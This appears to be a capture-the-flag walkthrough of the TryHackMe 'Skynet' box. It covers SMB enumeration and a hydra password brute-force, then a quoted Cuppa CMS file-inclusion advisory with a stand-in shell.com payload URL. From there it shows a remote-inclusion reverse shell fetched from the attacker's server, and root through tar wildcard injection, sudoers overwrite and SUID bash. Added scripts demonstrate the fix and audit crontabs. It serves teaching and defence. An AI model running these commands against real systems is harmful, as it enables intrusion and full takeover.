- SMB scan
- Password brute-force
- Known CMS vulnerability
- Cron job tar privilege escalation, passing options to tar through filenames via *
└─# nmap 10.10.192.134
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 17:44 CST
Nmap scan report for 10.10.192.134
Host is up (0.34s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 3.34 seconds
┌──(root㉿kali)-[~]
└─# nmap 10.10.192.134 -A -p 22,80,110,139,143,445
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 17:45 CST
Nmap scan report for 10.10.192.134
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE CAPA UIDL TOP RESP-CODES PIPELINING
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login LOGINDISABLEDA0001 Pre-login SASL-IR capabilities more ID LOGIN-REFERRALS listed have IDLE OK ENABLE LITERAL+
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (96%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2024-03-31T04:45:45-05:00
| smb2-time:
| date: 2024-03-31T09:45:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous but default)
|_clock-skew: mean: 1h40m00s deviation: 2h53m12s median: 0s
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 201.04 ms 10.2.0.1
2 ... 3
4 330.96 ms 10.10.192.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds
└─# ffuf -w /usr/share/wordlists/dirb/common.txt -u "http://10.10.192.134/FUZZ" -fs 1341
v2.1.0-dev
_______________________________________________
:: Method : GET
:: URL : http://10.10.192.134/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1341
_______________________________________________
.htpasswd [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 406ms]
[Status: 200 Size: 523 Words: 26 Lines: 19 Duration: 406ms]
.hta [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 4765ms]
.htaccess [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 4804ms]
admin [Status: 301 Size: 314 Words: 20 Lines: 10 Duration: 328ms]
config [Status: 301 Size: 315 Words: 20 Lines: 10 Duration: 327ms]
css [Status: 301 Size: 312 Words: 20 Lines: 10 Duration: 328ms]
index.html [Status: 200 Size: 523 Words: 26 Lines: 19 Duration: 349ms]
js [Status: 301 Size: 311 Words: 20 Lines: 10 Duration: 328ms]
server-status [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 329ms]
squirrelmail [Status: 301 Size: 321 Words: 20 Lines: 10 Duration: 327ms]
:: Progress: [4614/4614] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:42] :: Errors: 0 ::
└─# enum4linux 10.10.192.134
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 31 17:55:01 2024
=========================================( Target Information )=========================================
Target ........... 10.10.192.134
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==============================( Enumerating Workgroup/Domain on 10.10.192.134 )===========================
[+] Got domain/workgroup name: WORKGROUP
=============================( Nbtstat Information for 10.10.192.134 )===============================
SKYNET <00> - B Workstation Service
SKYNET <03> - B Messenger Service
SKYNET <20> - B File Server Service
..__MSBROWSE__. <01> - B Master Browser
WORKGROUP <00> - B Domain/Workgroup Name
WORKGROUP <1d> - B Master Browser
WORKGROUP <1e> - B Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 10.10.192.134 )===================================
[+] Server 10.10.192.134 allows sessions using username '', password ''
===============================( Getting domain SID for 10.10.192.134 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.192.134 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.192.134 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================Users on 10.10.192.134=======================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
==================( Share Enumeration on 10.10.192.134 )==================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
==================================( Password Policy Information for 10.10.192.134 )===================
[+] Attaching to 10.10.192.134 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] SKYNET
[+] Builtin
[+] Password Info for Domain: SKYNET
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
===========================( Groups on 10.10.192.134 )==========================
[+] Getting builtin groups:
=================( Users on 10.10.192.134 via RID cycling )==================
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
==============================( Getting printer info for 10.10.192.134 )===============================
No printers returned.
enum4linux complete on Sun Mar 31 18:19:07 2024
Checking share access: three shares are listed, but only anonymous can be mapped without credentials:
//10.10.192.134/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.192.134/anonymous Mapping: OK Listing: OK Writing: N/A
//10.10.192.134/milesdyson Mapping: DENIED Listing: N/A Writing: N/A
Anonymous access reveals a few files:
└─# smbclient //10.10.192.134/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Nov 27 00:04:00 2020
.. D 0 Tue Sep 17 15:20:17 2019
attention.txt N 163 Wed Sep 18 11:04:59 2019
logs D 0 Wed Sep 18 12:42:16 2019
9204224 blocks of size 1024. 5830976 blocks available
smb: \> get attention.txt
getting file attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
The note hints that passwords were recently changed. There are also a few logs:
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 12:42:16 2019
.. D 0 Fri Nov 27 00:04:00 2020
log2.txt N 0 Wed Sep 18 12:42:13 2019
log1.txt N 471 Wed Sep 18 12:41:59 2019
log3.txt N 0 Wed Sep 18 12:42:16 2019
9204224 blocks of size 1024. 5830976 blocks available
log1.txt looks like a password list (31 entries). Use it to brute-force the SquirrelMail login found by ffuf earlier, with milesdyson as the username:
└─# hydra -l milesdyson -P log1.txt 10.10.192.134 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect" -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-31 18:32:44
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 20 tasks per 1 server, overall 20 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.192.134:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect
[80][http-post-form] host: 10.10.192.134 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-31 18:33:06
Log in to the SquirrelMail mailbox with these credentials. One of the mails contains a password, which turns out to work for milesdyson's personal SMB share:
└─# smbclient //10.10.215.58/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> cd notes
smb: \notes\> get important.txt
The share holds a lot of files; notes/important.txt stands out, so we pull it down:
└─# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
The note points to a beta CMS with extra features under /45kra24zxs28v3yd. Enumerate that directory:
└─# dirsearch -u http://10.10.215.58/45kra24zxs28v3yd/ -x 403
dirsearch v0.4.2
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.215.58/-45kra24zxs28v3yd-_24-04-01_17-23-37.txt
Error Log: /root/.dirsearch/logs/errors-24-04-01_17-23-37.log
Target: http://10.10.215.58/45kra24zxs28v3yd/
[17:23:38] Starting:
[17:24:29] 301 - 337B - /45kra24zxs28v3yd/administrator -> http://10.10.215.58/45kra24zxs28v3yd/administrator/
[17:24:29] 200 - 5KB - /45kra24zxs28v3yd/administrator/
[17:24:29] 200 - 5KB - /45kra24zxs28v3yd/administrator/index.php
[17:25:00] 200 - 418B - /45kra24zxs28v3yd/index.html
Task Completed
The administrator login page is Cuppa CMS, so check exploit-db for known issues:
└─# searchsploit cuppa
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/tmp]
└─# locate php/webapps/25971.txt
/usr/share/exploitdb/exploits/php/webapps/25971.txt
┌──(root㉿kali)-[/tmp]
└─# cp /usr/share/exploitdb/exploits/php/webapps/25971.txt /tmp
┌──(root㉿kali)-[/tmp]
└─# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3Vwc
GEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcH
JlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1
pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJt
cDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZ
jsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2
RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7Cgk
JcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVf
bG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
Build the payload. The CMS lives under /45kra24zxs28v3yd/administrator/, so the vulnerable script is reached at:
http://10.10.215.58/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.11.235:8888/php-reverse-shell.php
The remote file inclusion fetches php-reverse-shell.php from our HTTP server (10.2.11.235:8888) and executes it, giving a reverse shell as the web server user. Remote inclusion only works because the target's PHP has allow_url_include enabled; otherwise the local inclusion and php://filter paths from the advisory are the fallback. Once the shell lands, upgrade it to an interactive TTY:
python -c 'import pty; pty.spawn("/bin/sh")'
$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$
A cron job running as root every minute is found: /home/milesdyson/backups/backup.sh. Read it:
$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
This script uses tar to back up everything under /var/www/html into /home/milesdyson/backups/backup.tgz, and cron runs it as root every minute. The classic tar privilege-escalation primitive is:
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
It relies on two GNU tar options:
- --checkpoint[=NUMBER]: emit a checkpoint every NUMBER records (default 10)
- --checkpoint-action=ACTION: run ACTION at every checkpoint; with exec=CMD, tar hands CMD to /bin/sh
Because backup.sh passes an unquoted * to tar, the shell expands it into one argument per filename in /var/www/html, and GNU tar accepts options anywhere on the command line. A filename that begins with -- is therefore parsed as an option, so we can smuggle both options in as filenames in the web root, which we can already write to as www-data:
touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh"
touch "/var/www/html/--checkpoint=1"
The second file makes the action fire on the first record instead of the tenth; sudo.sh is the script root will execute.
sudo.sh can do any of several things:
- echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > sudo.sh
  (this replaces /etc/sudoers outright; appending with >> is less destructive)
- printf '#!/bin/bash\nchmod +s /bin/bash\n' > sudo.sh
- echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > sudo.sh
The third variant leaves a SUID binary that is just a copy of bash. Run it with -p: without -p, bash resets its effective uid to the real uid when the two differ, and the SUID bit would achieve nothing.
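The following is an added example, not part of the original writeup: it reproduces the tar checkpoint injection in a throwaway directory as an unprivileged user, so the mechanism can be verified without waiting for the cron job, and then runs the same backup command with a `--` separator to show the fix. The scratch directory, payload.sh and marker file are stand-ins for /var/www/html, sudo.sh and the sudoers change; GNU tar is assumed, since busybox and bsdtar do not implement --checkpoint.

```bash
#!/bin/bash
# Added example, not from the original writeup. Demonstrates why
# `cd /var/www/html && tar cf ... *` is exploitable by anyone who can create
# files in that directory, and that `tar cf ... -- *` is not.
# Assumes GNU tar (--checkpoint and --checkpoint-action are GNU extensions).

is_gnu_tar() { tar --version 2>/dev/null | grep -q 'GNU tar'; }

# Populate a scratch directory the way an attacker would populate the web root.
# $1 = directory, $2 = absolute path of the marker file the payload creates.
setup_attacker_files() {
    local dir="$1" marker="$2"
    echo '<html>skynet</html>' > "$dir/index.html"        # legitimate content
    # payload.sh stands in for sudo.sh; it just proves it ran.
    printf '#!/bin/sh\necho executed > "%s"\n' "$marker" > "$dir/payload.sh"
    # Filenames that the shell's `*` turns into tar options.
    touch -- "$dir/--checkpoint=1"
    touch -- "$dir/--checkpoint-action=exec=sh payload.sh"
}

# The command as backup.sh runs it: bare glob, no `--`.
# Returns 0 if payload.sh executed, 1 if not, 2 if tar is not GNU tar.
tar_wildcard_vulnerable() {
    is_gnu_tar || return 2
    local work marker rc=1
    work=$(mktemp -d) || return 1
    marker="$work/marker"
    setup_attacker_files "$work" "$marker"
    ( cd "$work" && tar cf /dev/null * ) >/dev/null 2>&1 || true
    [ -f "$marker" ] && rc=0
    rm -rf "$work"
    return $rc
}

# Same command with `--`: everything after it is a file operand, so the
# option-looking names are simply archived. Returns 0 if the payload did NOT
# run, 1 if it did, 2 if tar is not GNU tar.
tar_wildcard_hardened() {
    is_gnu_tar || return 2
    local work marker rc=1
    work=$(mktemp -d) || return 1
    marker="$work/marker"
    setup_attacker_files "$work" "$marker"
    ( cd "$work" && tar cf /dev/null -- * ) >/dev/null 2>&1 || true
    [ -f "$marker" ] || rc=0
    rm -rf "$work"
    return $rc
}

main() {
    tar_wildcard_vulnerable; echo "bare glob:   payload ran?     rc=$? (0 = yes)"
    tar_wildcard_hardened;   echo "with --:     payload blocked? rc=$? (0 = yes)"
}
[ "${BASH_SOURCE[0]}" = "$0" ] && main
```

Passing `-C /var/www/html .` instead of a glob removes the problem entirely, because tar then enumerates the directory itself and never sees the filenames as arguments.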
Result of the sudoers variant, once the cron job has fired (within a minute):
sudo -l
User www-data may run the following commands on skynet:
(root) NOPASSWD: ALL
$ su
su
Password:
su: Authentication failure
$ sudo su
sudo su
root@skynet:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
Result of the SUID-copy variant (echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > sudo.sh):
$ ./nroot -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Result of the chmod +s /bin/bash variant:
bash-4.3$ /bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
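From the defender's side, the cron + tar pattern exploited above is easy to audit for. The script below is an added example, not from the original writeup: it walks a system crontab, follows jobs whose command is a script, and flags tar invocations that receive a bare * with no -- separator. The sample crontab and backup.sh it checks are constructed from the output above; the safe.sh variant, the temp paths and the function names are assumptions for the demo.

```bash
#!/bin/bash
# Added example, not from the original writeup: static check for
# cron jobs whose scripts run tar on a shell glob without a `--` separator.

# Print "FLAG <script>:<line>: <text>" for every tar line in $1 whose
# arguments contain a bare * and no `--`. Returns 0 if anything was flagged.
find_tar_glob_injection() {
    local script="$1" line n=0 hits=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case "$line" in \#*) continue ;; esac          # comments, shebang
        if printf '%s\n' "$line" | grep -Eq '(^|[[:space:];&|])tar[[:space:]].*[[:space:]]\*([[:space:]]|$)' \
           && ! printf '%s\n' "$line" | grep -Eq '(^|[[:space:]])--([[:space:]]|$)'; then
            echo "FLAG $script:$n: $line"
            hits=$((hits + 1))
        fi
    done < "$script"
    [ "$hits" -gt 0 ]
}

# Walk a system crontab ($1, format: m h dom mon dow user command). For each
# job whose first command word is an existing file, audit that script.
# Returns 0 if at least one script was flagged.
audit_crontab() {
    local crontab_file="$1" line cmd script found=1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|\#*|[A-Za-z_]*=*) continue ;;        # blank, comment, VAR=value
        esac
        cmd=$(printf '%s\n' "$line" | awk '{ $1=$2=$3=$4=$5=$6=""; sub(/^ +/, ""); print }')
        script=${cmd%% *}
        [ -f "$script" ] || continue
        if find_tar_glob_injection "$script"; then found=0; fi
    done < "$crontab_file"
    return $found
}

# Constructed demo input: the box's crontab line and backup.sh, plus a safe
# rewrite that should not be flagged. Returns audit_crontab's status.
demo_audit() {
    local dir rc
    dir=$(mktemp -d) || return 1
    cat > "$dir/backup.sh" <<'EOF'
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
EOF
    cat > "$dir/safe.sh" <<'EOF'
#!/bin/bash
tar cf /home/milesdyson/backups/backup.tgz -C /var/www/html -- .
EOF
    cat > "$dir/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root $dir/backup.sh
*/5 * * * * root $dir/safe.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
EOF
    audit_crontab "$dir/crontab"; rc=$?
    rm -rf "$dir"
    return $rc
}

[ "${BASH_SOURCE[0]}" = "$0" ] && demo_audit
```

On a real host, run `audit_crontab /etc/crontab` and repeat for the files under /etc/cron.d; a flagged script is only exploitable if a lower-privileged user can create files in the directory tar globs, so check that directory's ownership and mode next.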
Originally published on the WeChat public account ZeroPointZero安全团队 (ZeroPointZero Security Team): THM box walkthrough - Skynet